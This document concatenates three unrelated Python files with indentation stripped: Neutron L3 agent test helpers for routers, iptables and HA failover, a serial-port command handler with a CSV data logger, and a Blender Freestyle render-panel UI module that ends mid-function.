def _get_rule(self, iptables_manager, table, chain, predicate):
rules = iptables_manager.get_chain(table, chain)
result = next(rule for rule in rules if predicate(rule))
return result
def _assert_router_does_not_exist(self, router):
# If the namespace assertion succeeds
# then the devices and iptable rules have also been deleted,
# so there's no need to check that explicitly.
self.assertFalse(self._namespace_exists(router.ns_name))
common_utils.wait_until_true(
lambda: not self._metadata_proxy_exists(self.agent.conf, router))
def _assert_snat_chains(self, router):
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'snat'))
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'POSTROUTING'))
def _assert_floating_ip_chains(self, router, snat_bound_fip=False):
if snat_bound_fip:
self.assertFalse(router.snat_iptables_manager.is_chain_empty(
'nat', 'float-snat'))
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'float-snat'))
def _assert_iptables_rules_converged(self, router):
# if your code is failing on this line, it means you are not generating
# your iptables rules in the same format that iptables-save returns
# them. run iptables-save to see the format they should be in
self.assertFalse(router.iptables_manager.apply())
def _assert_metadata_chains(self, router):
metadata_port_filter = lambda rule: (
str(self.agent.conf.metadata_port) in rule.rule)
self.assertTrue(self._get_rule(router.iptables_manager,
'nat',
'PREROUTING',
metadata_port_filter))
self.assertTrue(self._get_rule(router.iptables_manager,
'filter',
'INPUT',
metadata_port_filter))
def _assert_internal_devices(self, router):
internal_devices = router.router[constants.INTERFACE_KEY]
self.assertGreater(len(internal_devices), 0)
for device in internal_devices:
self.assertTrue(self.device_exists_with_ips_and_mac(
device, router.get_internal_device_name, router.ns_name))
def _assert_extra_routes(self, router, namespace=None):
if namespace is None:
namespace = router.ns_name
routes = ip_lib.get_routing_table(4, namespace=namespace)
routes = [{'nexthop': route['nexthop'],
'destination': route['destination']} for route in routes]
for extra_route in router.router['routes']:
self.assertIn(extra_route, routes)
def _assert_onlink_subnet_routes(
self, router, ip_versions, namespace=None):
ns_name = namespace or router.ns_name
routes = []
for ip_version in ip_versions:
_routes = ip_lib.get_routing_table(ip_version,
namespace=ns_name)
routes.extend(_routes)
routes = set(route['destination'] for route in routes)
extra_subnets = router.get_ex_gw_port()['extra_subnets']
for extra_subnet in (route['cidr'] for route in extra_subnets):
self.assertIn(extra_subnet, routes)
def _assert_interfaces_deleted_from_ovs(self):
def assert_ovs_bridge_empty(bridge_name):
bridge = ovs_lib.OVSBridge(bridge_name)
self.assertFalse(bridge.get_port_name_list())
assert_ovs_bridge_empty(self.agent.conf.ovs_integration_bridge)
assert_ovs_bridge_empty(self.agent.conf.external_network_bridge)
def floating_ips_configured(self, router):
floating_ips = router.router[constants.FLOATINGIP_KEY]
external_port = router.get_ex_gw_port()
return len(floating_ips) and all(
ip_lib.device_exists_with_ips_and_mac(
router.get_external_device_name(external_port['id']),
['%s/32' % fip['floating_ip_address']],
external_port['mac_address'],
namespace=router.ns_name) for fip in floating_ips)
def _create_router(self, router_info, agent):
ns_name = "%s%s%s" % (
'qrouter-' + router_info['id'],
self.NESTED_NAMESPACE_SEPARATOR, agent.host)
ext_name = "qg-%s-%s" % (agent.host, _uuid()[-4:])
int_name = "qr-%s-%s" % (agent.host, _uuid()[-4:])
get_ns_name = mock.patch.object(
namespaces.RouterNamespace, '_get_ns_name').start()
get_ns_name.return_value = ns_name
get_ext_name = mock.patch.object(l3_router_info.RouterInfo,
'get_external_device_name').start()
get_ext_name.return_value = ext_name
get_int_name = mock.patch.object(l3_router_info.RouterInfo,
'get_internal_device_name').start()
get_int_name.return_value = int_name
router = self.manage_router(agent, router_info)
router_ext_name = mock.patch.object(router,
'get_external_device_name').start()
router_ext_name.return_value = get_ext_name.return_value
router_int_name = mock.patch.object(router,
'get_internal_device_name').start()
router_int_name.return_value = get_int_name.return_value
return router
def create_ha_routers(self):
router_info = self.generate_router_info(enable_ha=True)
router1 = self._create_router(router_info, self.agent)
self._add_fip(router1, '192.168.111.12')
r1_br = ip_lib.IPDevice(router1.driver.conf.external_network_bridge)
r1_br.addr.add('19.4.4.1/24')
r1_br.link.set_up()
router_info_2 = copy.deepcopy(router_info)
router_info_2[constants.HA_INTERFACE_KEY] = (
l3_test_common.get_ha_interface(ip='169.254.192.2',
mac='22:22:22:22:22:22'))
router2 = self._create_router(router_info_2, self.failover_agent)
r2_br = ip_lib.IPDevice(router2.driver.conf.external_network_bridge)
r2_br.addr.add('19.4.4.1/24')
r2_br.link.set_up()
return (router1, router2)
def _get_master_and_slave_routers(self, router1, router2):
try:
common_utils.wait_until_true(
lambda: router1.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(router1))
master_router = router1
slave_router = router2
except common_utils.WaitTimeout:
common_utils.wait_until_true(
lambda: router2.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(router2))
master_router = router2
slave_router = router1
common_utils.wait_until_true(
lambda: master_router.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(master_router))
common_utils.wait_until_true(
lambda: slave_router.ha_state == 'backup')
return master_router, slave_router
def fail_ha_router(self, router):
device_name = router.get_ha_device_name()
ha_device = ip_lib.IPDevice(device_name, router.ha_namespace)
ha_device.link.set_down()
@staticmethod
def fail_gw_router_port(router):
r_br = ip_lib.IPDevice(router.driver.conf.external_network_bridge)
r_br.link.set_down()
@staticmethod
def restore_gw_router_port(router):
r_br = ip_lib.IPDevice(router.driver.conf.external_network_bridge)
r_br.link.set_up()
@classmethod
def _get_addresses_on_device(cls, namespace, interface):
return [address['cidr'] for address in
ip_lib.IPDevice(interface, namespace=namespace).addr.list()]
def _assert_no_ip_addresses_on_interface(self, namespace, interface):
self.assertEqual(
[], self._get_addresses_on_device(namespace, interface))
def _assert_ip_addresses_on_interface(self,
namespace, interface, ip_addresses):
for ip_address in ip_addresses:
self._assert_ip_address_on_interface(namespace, interface,
ip_address)
def _assert_ip_address_on_interface(self,
namespace, interface, ip_address):
self.assertIn(
ip_address, self._get_addresses_on_device(namespace, interface))
def _assert_ping_reply_from_expected_address(
self, ping_result, expected_address):
ping_results = ping_result.split('\n')
self.assertGreater(
len(ping_results), 1,
"The result from ping should be multiple lines")
self.assertIn(
expected_address, ping_results[1],
("Expect to see %s in the reply of ping, but failed" %
expected_address))
|
import serial
import time
from datetime import datetime
import sys
import os
import yaml
import csv
import re
from validate_commands import CommandValidator
def build_cmd_string(command, values=None, format="%0.3f"):
txt = command
if values is not None:
#print("%s \t %s"%(command, values))
if isinstance(values, list) or isinstance(values, tuple):
if values:
for val in values:
txt+= ";"+format%(val)
else:
txt+=";"+format%(values)
cmd = txt+'\n'
return cmd
class CommandHandler:
def __init__(self, comm_list):
self.comm_list = comm_list
self.validators = []
self.num_chans = []
self.cmd_specs = []
for settings in self.comm_list:
self.num_chans.append(settings['num_channels'])
self.cmd_specs.append(settings['cmd_spec'])
self.validators.append(CommandValidator(settings["cmd_spec"], settings["num_channels"]))
def split_command(self, command, values, format="%0.3f"):
commands_out = []
for idx,_ in enumerate(self.comm_list):
spec = self.validators[idx].get_spec(command)
if spec is None:
split_how = None
else:
split_how = spec.get('split_how',None)
split_idx = None
switch_idx = None
# If we are not splitting the command, send the same thing to each controller
if split_how == None:
commands_out.append({'command':command, 'values':values})
# If we are splitting the command, determine how
else:
if isinstance(values,list) or isinstance(values,tuple):
values = list(values)
if len(values) ==0:
commands_out.append({'command':command, 'values':values})
continue
split_how_single = split_how.get('single_arg',None)
if spec['num_args'][0] == len(values):
if split_how_single is None:
commands_out.append({'command':command, 'values':values})
elif 'channel' in split_how_single:
channel = 0
split_idx = eval(split_how_single)
elif 'idx' in split_how_single:
channel = 0
switch_idx = int(re.match('.*?([0-9]+)$', split_how_single).group(1))
else:
commands_out.append(None)
else:
split_how_multi = split_how.get('multi_arg',None)
if split_how_multi is None:
commands_out.append({'command':command, 'values':values})
elif 'channel' in split_how_multi:
channel = 0
split_idx = eval(split_how_multi)
elif 'idx' in split_how_multi:
channel = 0
switch_idx = int(re.match('.*?([0-9]+)$', split_how_single).group(1))
else:
commands_out.append(None)
else:
commands_out.append({'command':command, 'values':values})
max_chan = sum(self.num_chans[0:idx+1])
min_chan = sum(self.num_chans[0:idx])
if split_idx is not None:
curr_vals = values[0:split_idx]
if len(values) >=max_chan+split_idx:
curr_vals.extend(values[min_chan+split_idx:max_chan+split_idx])
else:
curr_vals.extend(values[min_chan+split_idx:])
commands_out.append({'command':command, 'values':curr_vals})
elif switch_idx is not None:
if values[switch_idx] < max_chan and values[switch_idx] >= min_chan:
values[switch_idx] = float(values[switch_idx]) - min_chan
commands_out.append({'command':command, 'values':values})
else:
commands_out.append(None)
return commands_out
class CommHandler:
def __init__(self):
self.serial_settings = None
self.s = None
def initialize(self, devname=None, baudrate=None, ser=None):
if devname is not None and baudrate is not None:
self.s = [serial.Serial(devname,baudrate)]
elif ser is not None:
self.s = [ser]
elif self.serial_settings is not None:
self.s = []
for settings in self.serial_settings:
self.s.append(serial.Serial(settings["devname"], settings["baudrate"]))
else:
self.s = None
raise ValueError("CommHandler expects either a devname and baudrate, or and existing serial object")
self.command_handler=CommandHandler(self.serial_settings)
self.validator = []
self.loggers = []
for idx, settings in enumerate(self.serial_settings):
validator_curr = self.command_handler.validators[idx]
self.validator.append(validator_curr)
self.loggers.append(DataSaver(settings,validator_curr))
# Get serial settings from a file
def read_serial_settings(self, file=None):
file_path = os.path.dirname(os.path.realpath(__file__))
if file is None:
file=os.path.join(file_path,"..","config","comms","comms_config.yaml")
with open(file) as f:
# use safe_load instead of load
hardware_settings = yaml.safe_load(f)
f.close()
hw_file = hardware_settings.get('hardware')
devnames = hardware_settings.get('devnames')
hw_fullfile=os.path.join(file_path,"..","config","hardware",hw_file+".yaml")
with open(hw_fullfile) as f:
# use safe_load instead of load
serial_settings = yaml.safe_load(f)
f.close()
for idx, obj in enumerate(serial_settings):
obj['devname'] = devnames[idx]
self.serial_settings = serial_settings
return serial_settings
# Set serial settings directly
def get_serial_settings(self):
return self.serial_settings
# Set serial settings directly
def set_serial_settings(self, serial_settings):
self.serial_settings=serial_settings
# Send commands out
def send_command(self, command, values=None, format="%0.3f"):
cmd_obj = self.command_handler.split_command(command, values)
cmd = []
for cmd_curr in cmd_obj:
if cmd_curr is None:
cmd.append(None)
else:
cmd.append(build_cmd_string(cmd_curr['command'], cmd_curr['values'], format) )
print(cmd, len(cmd))
for ser, cmd_curr in zip(self.s,cmd):
if cmd_curr is not None:
ser.write(cmd_curr.encode())
# Send a raw string out
def send_string(self, string, eol='\n'):
string+=eol
for ser in self.s:
ser.write(string.encode())
# Read one line
def read_line(self, display=False, raw=False):
out=[None]*len(self.s)
for idx,ser in enumerate(self.s):
curr_line = None
if ser.in_waiting: # Or: while ser.inWaiting():
curr_line = ser.readline().decode().strip()
out[idx] = curr_line
if curr_line is not None and display:
print(curr_line)
if out == [None]*len(self.s):
return None
elif raw:
return out
else:
new_out = []
for idx,_ in enumerate(out):
line = self.validator[idx].process_line(out[idx])
if line is None:
new_out.append(None)
else:
new_out.append(line[0])
if new_out == [None]*len(self.s):
return None
return new_out
def read_all(self, display=False, raw=False):
out = []
new_line = []
while new_line != None: # Or: while ser.inWaiting():
new_line = self.read_line(display, raw)
if new_line is not None:
out.append(new_line)
if len(out) ==0:
return None
else:
return out
def save_init(self, filename, filetype='csv'):
for idx,logger in enumerate(self.loggers):
file, file_extension = os.path.splitext(filename)
logger.save_init(file+"_%02d"%(idx)+file_extension,filetype)
def save_data_lines(self,data_lines):
for line in data_lines:
self.save_data_line(line)
def save_data_line(self,data_line):
for idx, _ in enumerate(self.serial_settings):
self.loggers[idx].save_data_line(data_line[idx])
# Upon shutdown, close the serial instance
def shutdown(self):
if self.s is not None:
for ser in self.s:
ser.close()
for logger in self.loggers:
logger.shutdown()
# Upon object deletion, shut down the serial handler
def __del__(self):
self.shutdown()
class DataSaver:
def __init__(self, serial_settings, validator):
self.serial_settings = serial_settings
self.validator = validator
self.out_file = None
self.file_writer = None
def save_init(self, filename, filetype='csv'):
num_channels = self.serial_settings['num_channels']
data_to_save = self.validator.cmd_data['types'].keys()
data_flat_labels = ['time']
data_labels = ['time']
data_lens = [1]
for data_type in data_to_save:
curr_type = self.validator.cmd_data['types'][data_type]
curr_label = curr_type['label']
curr_len = curr_type['length']
if curr_len == 'num_channels':
curr_len = num_channels
data_labels.append(curr_label)
data_lens.append(curr_len)
if curr_len>1:
for idx in range(curr_len):
data_flat_labels.append(curr_label+"[%d]"%(idx))
else:
data_flat_labels.append(curr_label)
data_labels.extend(['_command', '_args'])
data_flat_labels.extend(['_command', '_args'])
data_lens.extend([1,1])
self.data_to_save = data_to_save
self.data_labels = data_labels
self.data_lens = data_lens
self.data_flat_labels = data_flat_labels
self.out_file = open(filename, "w+")
self.file_writer = csv.writer(self.out_file)
self.file_writer.writerow(self.data_flat_labels)
def save_data_lines(self,data_lines):
for line in data_lines:
self.save_data_line(line)
def save_data_line(self,data_line):
try:
if data_line is None:
return
data=[]
for idx,key in enumerate(self.data_labels):
expected_len = self.data_lens[idx]
dat = data_line.get(key,None)
if isinstance(dat, list):
for curr_dat in dat:
data.append(curr_dat)
if expected_len > len(dat):
for idx in range(expected_len-len(dat)):
data.append("")
if expected_len < len(dat):
print("data array is longer than we expected")
elif dat is not None:
data.append(dat)
else:
for idx in range(expected_len):
data.append("")
self.file_writer.writerow(data)
except IOError:
print("I/O error")
# Upon shutdown, close the serial instance
def shutdown(self):
if self.out_file is not None:
self.out_file.close()
def __del__(self):
self.shutdown()
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Menu, Panel, UIList
# Render properties
class RenderFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
scene = context.scene
with_freestyle = bpy.app.build_options.freestyle
return scene and with_freestyle and(context.engine in cls.COMPAT_ENGINES)
class RENDER_PT_freestyle(RenderFreestyleButtonsPanel, Panel):
bl_label = "Freestyle"
bl_options = {'DEFAULT_CLOSED'}
bl_order = 10
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_header(self, context):
rd = context.scene.render
self.layout.prop(rd, "use_freestyle", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
rd = context.scene.render
layout.active = rd.use_freestyle
layout.prop(rd, "line_thickness_mode", expand=True)
if rd.line_thickness_mode == 'ABSOLUTE':
layout.prop(rd, "line_thickness")
# Render layer properties
class ViewLayerFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "view_layer"
bl_order = 10
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
scene = context.scene
rd = scene.render
with_freestyle = bpy.app.build_options.freestyle
return (scene and with_freestyle and rd.use_freestyle and
(context.engine in cls.COMPAT_ENGINES))
class ViewLayerFreestyleEditorButtonsPanel(ViewLayerFreestyleButtonsPanel):
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
if not super().poll(context):
return False
view_layer = context.view_layer
return view_layer and view_layer.freestyle_settings.mode == 'EDITOR'
class VIEWLAYER_UL_linesets(UIList):
def draw_item(self, _context, layout, _data, item, icon, _active_data, _active_propname, index):
lineset = item
if self.layout_type in {'DEFAULT', 'COMPACT'}:
layout.prop(lineset, "name", text="", emboss=False, icon_value=icon)
layout.prop(lineset, "show_render", text="", index=index)
elif self.layout_type == 'GRID':
layout.alignment = 'CENTER'
layout.label(text="", icon_value=icon)
class RENDER_MT_lineset_context_menu(Menu):
bl_label = "Lineset Specials"
def draw(self, _context):
layout = self.layout
layout.operator("scene.freestyle_lineset_copy", icon='COPYDOWN')
layout.operator("scene.freestyle_lineset_paste", icon='PASTEDOWN')
class VIEWLAYER_PT_freestyle(ViewLayerFreestyleButtonsPanel, Panel):
bl_label = "Freestyle"
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
freestyle = view_layer.freestyle_settings
layout.active = view_layer.use_freestyle
row = layout.row()
layout.prop(freestyle, "mode", text="Control Mode")
layout.prop(freestyle, "use_view_map_cache", text="View Map Cache")
layout.prop(freestyle, "as_render_pass", text="As Render Pass")
layout.label(text="Edge Detection Options:")
split = layout.split()
col = split.column()
col.prop(freestyle, "crease_angle")
col.prop(freestyle, "use_culling")
col.prop(freestyle, "use_advanced_options")
col = split.column()
col.prop(freestyle, "use_smoothness")
if freestyle.mode == 'SCRIPT':
col.prop(freestyle, "use_material_boundaries")
# Advanced options are hidden by default to warn new users
if freestyle.use_advanced_options:
if freestyle.mode == 'SCRIPT':
row = layout.row()
row.prop(freestyle, "use_ridges_and_valleys")
row.prop(freestyle, "use_suggestive_contours")
row = layout.row()
row.prop(freestyle, "sphere_radius")
row.prop(freestyle, "kr_derivative_epsilon")
if freestyle.mode == 'SCRIPT':
row = layout.row()
row.label(text="Style modules:")
row.operator("scene.freestyle_module_add", text="Add")
for module in freestyle.modules:
box = layout.box()
box.context_pointer_set("freestyle_module", module)
row = box.row(align=True)
row.prop(module, "use", text="")
row.prop(module, "script", text="")
row.operator("scene.freestyle_module_open", icon='FILEBROWSER', text="")
row.operator("scene.freestyle_module_remove", icon='X', text="")
row.operator("scene.freestyle_module_move", icon='TRIA_UP', text="").direction = 'UP'
row.operator("scene.freestyle_module_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
class VIEWLAYER_PT_freestyle_lineset(ViewLayerFreestyleEditorButtonsPanel, Panel):
bl_label = "Freestyle Line Set"
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_edge_type_buttons(self, box, lineset, edge_type):
# property names
select_edge_type = "select_" + edge_type
exclude_edge_type = "exclude_" + edge_type
# draw edge type buttons
row = box.row(align=True)
row.prop(lineset, select_edge_type)
sub = row.column(align=True)
sub.prop(lineset, exclude_edge_type, text="")
sub.active = getattr(lineset, select_edge_type)
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
freestyle = view_layer.freestyle_settings
lineset = freestyle.linesets.active
layout.active = view_layer.use_freestyle
row = layout.row()
rows = 4 if lineset else 2
row.template_list(
"VIEWLAYER_UL_linesets",
"",
freestyle,
"linesets",
freestyle.linesets,
"active_index",
rows=rows,
)
sub = row.column(align=True)
sub.operator("scene.freestyle_lineset_add", icon='ADD', text="")
sub.operator("scene.freestyle_lineset_remove", icon='REMOVE', text="")
sub.menu("RENDER_MT_lineset_context_menu", icon='DOWNARROW_HLT', text="")
if lineset:
sub.separator()
sub.separator()
sub.operator("scene.freestyle_lineset_move", icon='TRIA_UP', text="").direction = 'UP'
sub.operator("scene.freestyle_lineset_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
col = layout.column()
col.label(text="Selection By:")
row = col.row(align=True)
row.prop(lineset, "select_by_visibility", text="Visibility", toggle=True)
row.prop(lineset, "select_by_edge_types", text="Edge Types", toggle=True)
row.prop(lineset, "select_by_face_marks", text="Face Marks", toggle=True)
row.prop(lineset, "select_by_collection", text="Collection", toggle=True)
row.prop(lineset, "select_by_image_border", text="Image Border", toggle=True)
if lineset.select_by_visibility:
col.label(text="Visibility:")
row = col.row(align=True)
row.prop(lineset, "visibility", expand=True)
if lineset.visibility == 'RANGE':
row = col.row(align=True)
row.prop(lineset, "qi_start")
row.prop(lineset, "qi_end")
if lineset.select_by_edge_types:
col.label(text="Edge Types:")
row = col.row()
row.prop(lineset, "edge_type_negation", expand=True)
row.prop(lineset, "edge_type_combination", expand=True)
split = col.split()
sub = split.column()
self.draw_edge_type_buttons(sub, lineset, "silhouette")
self.draw_edge_type_buttons(sub, lineset, "border")
self.draw_edge_type_buttons(sub, lineset, "contour")
self.draw_edge_type_buttons(sub, lineset, "suggestive_contour")
self.draw_edge_type_buttons(sub, lineset, "ridge_valley")
sub = split.column()
self.draw_edge_type_buttons(sub, lineset, "crease")
self.draw_edge_type_buttons(sub, lineset, "edge_mark")
self.draw_edge_type_buttons(sub, lineset, "external_contour")
self.draw_edge_type_buttons(sub, lineset, "material_boundary")
if lineset.select_by_face_marks:
col.label(text="Face Marks:")
row = col.row()
row.prop(lineset, "face_mark_negation", expand=True)
row.prop(lineset, "face_mark_condition", expand=True)
if lineset.select_by_collection:
col.label(text="Collection:")
row = col.row()
row.prop(lineset, "collection", text="")
row.prop(lineset, "collection_negation", expand=True)
class VIEWLAYER_PT_freestyle_linestyle(ViewLayerFreestyleEditorButtonsPanel, Panel):
bl_label = "Freestyle Line Style"
bl_options = {'DEFAULT_CLOSED'}
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_modifier_box_header(self, box, modifier):
row = box.row()
row.context_pointer_set("modifier", modifier)
if modifier.expanded:
icon = 'TRIA_DOWN'
else:
icon = 'TRIA_RIGHT'
row.prop(modifier, "expanded", text="", icon=icon, emboss=False)
# TODO: Use icons rather than text label, would save some room!
row.label(text=modifier.rna_type.name)
row.prop(modifier, "name", text="")
if modifier.use:
icon = 'RESTRICT_RENDER_OFF'
else:
icon = 'RESTRICT_RENDER_ON'
row.prop(modifier, "use", text="", icon=icon)
sub = row.row(align=True)
sub.operator("scene.freestyle_modifier_copy", icon='NONE', text="Copy")
sub.operator("scene.freestyle_modifier_move", icon='TRIA_UP', text="").direction = 'UP'
sub.operator("scene.freestyle_modifier_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
sub.operator("scene.freestyle_modifier_remove", icon='X', text="")
def draw_modifier_box_error(self, box, _modifier, message):
row = box.row()
row.label(text=message, icon='ERROR')
def draw_modifier_common(self, box, modifier):
row = box.row()
row.prop(modifier, "blend", text="")
row.prop(modifier, "influence")
def draw_modifier_color_ramp_common(self, box, modifier, has_range):
box.template_color_ramp(modifier, "color_ramp", expand=True)
if has_range:
row = box.row(align=True)
row.prop(modifier, "range_min")
row.prop(modifier, "range_max")
def draw_modifier_curve_common(self, box, modifier, has_range, has_value):
row = box.row()
row.prop(modifier, "mapping", text="")
sub = row.column()
sub.prop(modifier, "invert")
if modifier.mapping == 'CURVE':
sub.active = False
box.template_curve_mapping(modifier, "curve")
if has_range:
row = box.row(align=True)
row.prop(modifier, "range_min")
row.prop(modifier, "range_max")
if has_value:
row = box.row(align=True)
row.prop(modifier, "value_min")
row.prop(modifier, "value_max")
def draw_color_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_color_ramp_common(box, modifier, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'COLOR'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_color_ramp_common(box, modifier, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'COLOR'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
row = box.row()
row.prop(modifier, "material_attribute", text="")
sub = row.column()
sub.prop(modifier, "use_ramp")
if modifier.material_attribute in {'LINE', 'DIFF', 'SPEC'}:
sub.active = True
show_ramp = modifier.use_ramp
else:
sub.active = False
show_ramp = True
if show_ramp:
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'TANGENT':
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'NOISE':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row.prop(modifier, "seed")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_alpha_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_curve_common(box, modifier, True, False)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'ALPHA'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_curve_common(box, modifier, True, False)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'ALPHA'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
box.prop(modifier, "material_attribute", text="")
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'TANGENT':
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'NOISE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row.prop(modifier, "seed")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_thickness_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_curve_common(box, modifier, False, True)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_curve_common(box, modifier, True, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'THICKNESS'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_curve_common(box, modifier, True, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'THICKNESS'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
box.prop(modifier, "material_attribute", text="")
self.draw_modifier_curve_common(box, modifier, False, True)
elif modifier.type == 'CALLIGRAPHY':
box.prop(modifier, "orientation")
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
elif modifier.type == 'TANGENT':
self.draw_modifier_curve_common(box, modifier, False, False)
self.mapping = 'CURVE'
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
elif modifier.type == 'NOISE':
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row = box.row(align=False)
row.prop(modifier, "seed")
row.prop(modifier, "use_asymmetric")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_geometry_modifier(self, _context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
if modifier.type == 'SAMPLING':
box.prop(modifier, "sampling")
elif modifier.type == 'BEZIER_CURVE':
box.prop(modifier, "error")
elif modifier.type == 'SINUS_DISPLACEMENT':
split = box.split()
col = split.column()
col.prop(modifier, "wavelength")
col.prop(modifier, "amplitude")
col = split.column()
col.prop(modifier, "phase")
elif modifier.type == 'SPATIAL_NOISE':
split = box.split()
col = split.column()
col.prop(modifier, "amplitude")
col.prop(modifier, "scale")
col.prop(modifier, "octaves")
col = split.column()
col.prop(modifier, "smooth")
col.prop(modifier, "use_pure_random")
elif modifier.type == 'PERLIN_NOISE_1D':
split = box.split()
col = split.column()
col.prop(modifier, "frequency")
col.prop(modifier, "amplitude")
col.prop(modifier, "seed")
col = split.column()
col.prop(modifier, "octaves")
col.prop(modifier, "angle")
elif modifier.type == 'PERLIN_NOISE_2D':
split = box.split()
col = split.column()
col.prop(modifier, "frequency")
